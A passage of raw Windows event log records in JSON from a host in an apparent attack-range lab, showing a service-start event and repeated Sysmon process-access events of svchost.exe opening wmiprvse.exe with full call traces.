05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76815,"ProcessID":856,"ThreadID":1128,"Channel":"System","Message":"The AmazonSSMAgent service entered the running state.","param1":"AmazonSSMAgent","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1020,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.891\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.891","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1021,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.891\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.891","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1022,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.891\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.891","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1023,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.891\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.891","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1024,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.891\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.891","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1025,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.891\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.891","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1026,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.891\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.891","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1027,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.891\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.891","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Wi